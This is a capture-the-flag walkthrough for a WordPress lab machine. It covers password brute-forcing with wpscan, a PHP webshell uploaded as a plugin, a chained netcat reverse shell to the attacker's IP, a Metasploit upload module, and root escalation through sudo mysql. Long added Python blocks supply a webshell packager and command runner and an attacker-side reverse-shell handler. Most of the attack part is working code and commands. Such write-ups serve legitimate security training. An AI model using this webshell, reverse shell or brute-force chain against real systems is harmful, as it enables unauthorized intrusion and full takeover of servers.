Information gathering
An nmap scan shows only port 80 open:
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Directory scan
feroxbuster --url http://192.168.56.107
The target is a WordPress site, but the landing page renders almost bare: the HTML hard-codes its stylesheet and other asset URLs to a different address. WordPress builds these links from the siteurl/home values stored in wp_options, so they still point at the IP the site was installed with rather than the one it currently answers on:
<link rel='stylesheet' id='dashicons-css' href='http://192.168.159.145/wordpress/wp-includes/css/dashicons.min.css?ver=5.7.1' media='all' />
<link rel='stylesheet' id='buttons-css' href='http://192.168.159.145/wordpress/wp-includes/css/buttons.min.css?ver=5.7.1' media='all' />
<link rel='stylesheet' id='forms-css' href='http://192.168.159.145/wordpress/wp-admin/css/forms.min.css?ver=5.7.1' media='all' />
<link rel='stylesheet' id='l10n-css' href='http://192.168.159.145/wordpress/wp-admin/css/l10n.min.css?ver=5.7.1' media='all' />
<link rel='stylesheet' id='login-css' href='http://192.168.159.145/wordpress/wp-admin/css/login.min.css?ver=5.7.1' media='all' />
Our target is 192.168.56.107 and 192.168.159.145 is not reachable from our network, so the browser cannot load those assets, and we cannot change the stored URL on the server from outside. The fix is client-side: in Burp, under Proxy / Options, add a Match and Replace rule on responses that rewrites 192.168.159.145 to 192.168.56.107 in response bodies (and in redirect Location headers, since WordPress redirects to its stored siteurl).
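The same rewrite can be done without Burp. The block below is an added example, not part of the original write-up: a small reverse proxy that forwards to the real target, rewrites the stale origin in text bodies and Location headers, and points the rewritten links back at itself so that every later request keeps flowing through it. The two addresses are the ones from the write-up; the listen port 8080 and the list of content types treated as text are assumptions.

```python
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Added example, not the write-up's tooling. Addresses are from the write-up; the
# listen port is an assumption.
STALE_ORIGIN = "http://192.168.159.145"   # origin WordPress has stored and bakes into links
TARGET_ORIGIN = "http://192.168.56.107"   # where the box actually answers
LISTEN = ("127.0.0.1", 8080)
PROXY_ORIGIN = f"http://{LISTEN[0]}:{LISTEN[1]}"

# Only text-like bodies are rewritten; binary assets pass through untouched.
TEXT_TYPES = ("text/", "application/javascript", "application/json", "application/xml")
# Headers we must not forward verbatim: length is recomputed and bodies are never re-encoded.
DROP_HEADERS = {"content-length", "transfer-encoding", "content-encoding", "connection"}


def rewrite_text(data: bytes, stale=STALE_ORIGIN, replacement=PROXY_ORIGIN) -> bytes:
    """Point every baked-in absolute URL at the proxy so later requests stay in the loop."""
    return data.replace(stale.encode(), replacement.encode())


def rewrite_headers(headers, stale=STALE_ORIGIN, replacement=PROXY_ORIGIN):
    """Rewrite redirect targets and drop hop-by-hop / encoding headers; returns (name, value) pairs."""
    kept = []
    for name, value in headers:
        lname = name.lower()
        if lname in DROP_HEADERS:
            continue
        if lname == "location":
            value = value.replace(stale, replacement)
        kept.append((name, value))
    return kept


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Hand 3xx responses back to the browser instead of following them server-side."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


OPENER = urllib.request.build_opener(NoRedirect)


class RewritingProxy(BaseHTTPRequestHandler):
    def _proxy(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else None
        fwd = {k: v for k, v in self.headers.items()
               if k.lower() not in ("host", "accept-encoding", "connection")}
        fwd["Accept-Encoding"] = "identity"          # keep bodies rewritable
        req = urllib.request.Request(TARGET_ORIGIN + self.path, data=body,
                                     headers=fwd, method=self.command)
        try:
            resp = OPENER.open(req, timeout=15)
        except urllib.error.HTTPError as err:        # 3xx/4xx/5xx still carry a usable response
            resp = err
        except urllib.error.URLError as err:
            self.send_error(502, f"upstream error: {err.reason}")
            return
        data = resp.read()
        if resp.headers.get("Content-Type", "").startswith(TEXT_TYPES):
            data = rewrite_text(data)
        self.send_response(resp.status if hasattr(resp, "status") else resp.code)
        for name, value in rewrite_headers(resp.headers.items()):
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    do_GET = _proxy
    do_POST = _proxy


if __name__ == "__main__":
    print(f"browse to {PROXY_ORIGIN}/wordpress/ ; forwarding to {TARGET_ORIGIN}")
    ThreadingHTTPServer(LISTEN, RewritingProxy).serve_forever()
```

Rewriting the stale origin to the proxy's own origin, rather than to the target's, matters: if links pointed straight at 192.168.56.107 the browser would bypass the proxy on the next click and land on a page that again references 192.168.159.145. Redirects are passed through unfollowed for the same reason, with their Location rewritten.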
With that rule in place the page renders normally. Next, brute-force the admin password with wpscan:
wpscan --url http://192.168.56.107/wordpress -U admin -P /rockyou.txt
Result: admin / adam14
Getting a shell
In the admin dashboard the Plugins module lets an administrator upload arbitrary PHP, so upload a hand-written plugin that doubles as a webshell. WordPress only recognises the file as a plugin if it carries the header comment block; the body simply executes whatever arrives in the cmd parameter:
<?php
/*
Plugin Name: shell
Plugin URI: https://developer.wordpress.org/plugins/the-basics/
Description: Basic WordPress Plugin Header Comment
Version: 20160911
Author: WordPress.org
Author URI: https://developer.wordpress.org/
License: GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
Text Domain: wporg
Domain Path: /languages
*/
// The header block above is the stock example from the WordPress plugin handbook;
// only "Plugin Name:" is required for the uploader to accept the file.
// Webshell body: run the cmd query parameter as the web server user (www-data).
if(isset($_GET['cmd']))
{
    system($_GET['cmd']);
}
?>
Zip the file as shell/shell.php (the plugin uploader expects a zip archive) and upload it via Plugins / Add New / Upload Plugin. The file then sits under the web root, so it can be requested directly without even activating the plugin:
http://192.168.56.107/wordpress/wp-content/plugins/shell/shell.php?cmd=ls
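Packaging and driving the plugin is easy to get slightly wrong (a missing Plugin Name header makes the uploader reject the archive, and unencoded spaces, pipes or ampersands in cmd break the query string). The block below is an added example, not the write-up's own tooling: it builds the zip in the layout that installs to wp-content/plugins/shell/, checks for the header, and percent-encodes commands into the webshell URL. The slug and base URL are those from the write-up; PLUGIN_PHP is a trimmed copy of the plugin above (only the Plugin Name line is required).

```python
import io
import urllib.request
import zipfile
from urllib.parse import quote

# Added example, not from the write-up. Slug and base URL are taken from it.
PLUGIN_SLUG = "shell"
BASE_URL = "http://192.168.56.107/wordpress"
# Trimmed copy of the write-up's plugin: the header needs only "Plugin Name:".
PLUGIN_PHP = """<?php
/*
Plugin Name: shell
Description: minimal command-execution plugin
Version: 0.1
*/
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
"""


def has_plugin_header(php_source: str) -> bool:
    """WordPress lists a file as a plugin only if its comment block carries 'Plugin Name:'."""
    return "Plugin Name:" in php_source


def build_plugin_zip(slug: str, php_source: str) -> bytes:
    """Zip bytes laid out as <slug>/<slug>.php, which installs to wp-content/plugins/<slug>/."""
    if not has_plugin_header(php_source):
        raise ValueError("missing 'Plugin Name:' header; the uploader reports 'No valid plugins were found'")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php", php_source)
    return buf.getvalue()


def zip_members(zip_bytes: bytes) -> list:
    """Member names of a zip, for checking the layout before uploading."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


def webshell_url(base_url: str, slug: str, command: str) -> str:
    """Direct path to the installed file; the command is percent-encoded so spaces, | and & survive."""
    return f"{base_url}/wp-content/plugins/{slug}/{slug}.php?cmd={quote(command, safe='')}"


def run_command(base_url: str, slug: str, command: str, timeout: float = 10.0) -> str:
    """Execute a command through the webshell and return the response body (needs network access)."""
    with urllib.request.urlopen(webshell_url(base_url, slug, command), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    with open(f"{PLUGIN_SLUG}.zip", "wb") as fh:
        fh.write(build_plugin_zip(PLUGIN_SLUG, PLUGIN_PHP))
    # stderr is appended so failures show up in the HTTP response instead of the Apache log
    print(webshell_url(BASE_URL, PLUGIN_SLUG, "id; ls -la /var/www/html 2>&1"))
```

system() only returns the command's stdout, so append 2>&1 to a command whose error output you want to see in the response.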
Chained reverse shell
Run through the webshell, this chain gives an interactive command channel without needing nc -e on the target:
nc 192.168.56.103 3333 | /bin/bash | nc 192.168.56.103 4444
On the attacker (192.168.56.103) listen on both ports: lines typed into the 3333 listener are piped into bash's stdin on the target, and bash's stdout comes back to the 4444 listener. Only stdout returns; stderr stays on the target, so append 2>&1 to any command whose errors you want to see.
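Juggling two nc listeners in two terminals is clumsy. The block below is an added example, not part of the write-up: an attacker-side handler that accepts both halves of the chain, sends each typed line down the command channel and reads the reply from the output channel. The port numbers are those from the write-up; binding to 0.0.0.0 and the one-second quiet period used to decide that a command has finished are assumptions.

```python
import socket
import sys

# Added example (not from the write-up): attacker-side handler for the chain
#   nc ATTACKER 3333 | /bin/bash | nc ATTACKER 4444
# run on the target. 3333 carries commands to bash's stdin, 4444 carries its stdout back.
# Ports and bind address are assumptions; pass 0 for a port to let the kernel pick one.


class DualChannelHandler:
    """Listens on a command port and an output port and pairs the two connections."""

    def __init__(self, host="0.0.0.0", cmd_port=3333, out_port=4444, accept_timeout=60.0):
        self.cmd_listener = self._listen(host, cmd_port, accept_timeout)
        self.out_listener = self._listen(host, out_port, accept_timeout)
        self.cmd_conn = None
        self.out_conn = None

    @staticmethod
    def _listen(host, port, timeout):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind((host, port))
        sock.listen(1)
        sock.settimeout(timeout)
        return sock

    def ports(self):
        """Ports actually bound (useful when 0 was requested)."""
        return self.cmd_listener.getsockname()[1], self.out_listener.getsockname()[1]

    def accept(self):
        # The target starts all three processes at once, so the two connections can
        # arrive in either order; the listen backlog holds whichever comes first.
        self.cmd_conn, _ = self.cmd_listener.accept()
        self.out_conn, _ = self.out_listener.accept()

    def run(self, command, quiet_after=1.0):
        """Send one command line and collect output until the channel is quiet or closed."""
        self.cmd_conn.sendall(command.encode() + b"\n")
        self.out_conn.settimeout(quiet_after)
        chunks = []
        while True:
            try:
                data = self.out_conn.recv(4096)
            except socket.timeout:
                break          # nothing more arrived within the quiet period
            if not data:
                break          # target closed the output channel
            chunks.append(data)
        return b"".join(chunks).decode(errors="replace")

    def close(self):
        for sock in (self.cmd_conn, self.out_conn, self.cmd_listener, self.out_listener):
            if sock is not None:
                sock.close()


def interactive(handler):
    """Read commands from stdin and print what comes back over the output channel."""
    for line in sys.stdin:
        sys.stdout.write(handler.run(line.rstrip("\n")))
        sys.stdout.flush()


if __name__ == "__main__":
    h = DualChannelHandler()
    print("waiting for the chain on ports", h.ports())
    h.accept()
    try:
        interactive(h)
    finally:
        h.close()
```

Because there is no end-of-command marker on the wire, the handler decides a command has finished once the output channel has been quiet for quiet_after seconds; output from a slow command (sleep, a long find) will simply show up at the start of the next reply, so raise the value for such commands.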
Alternative: Metasploit
msfconsole
# find the module
search wp_admin shell
# select it
use exploit/unix/webapp/wp_admin_shell_upload
# list the options it needs (target host, the /wordpress path, the admin credentials) and set them
show options
# launch
run
Either way the shell runs as www-data. The WordPress admin password is reused for the local account: su wpadmin with adam14 succeeds, and the first flag is in that user's home directory:
cat local.txt
153495edec1b606c24947b1335998bd9
Privilege escalation
wpadmin is allowed to run the MySQL client as root through sudo. Log in (-p is the MySQL client's own password prompt):
sudo /usr/bin/mysql -u root -D wordpress -p
The client's system command (alias \!) runs a shell command on the local machine with the privileges of the client process, and sudo started that process as root, so every command it runs is root:
MariaDB [wordpress]> system id
uid=0(root) gid=0(root) groups=0(root)
MariaDB [wordpress]> system ls /root
proof.txt snap
MariaDB [wordpress]> system cat /root/proof.txt
7efd721c8bfff2937c66235f2d0dbac1
Second flag obtained. The same client command will start an interactive shell if given a shell binary, which is the cleaner way to keep a root session instead of running one command at a time. The sudo rule is the real finding here: any program that can spawn a subprocess (mysql, vim, less, find, and many more) is a root shell once sudo permits it.
Note: the MySQL password used here was taken from the WordPress configuration file, which stores the database credentials in the DB_USER and DB_PASSWORD defines:
/var/www/html/wordpress/wp-config.php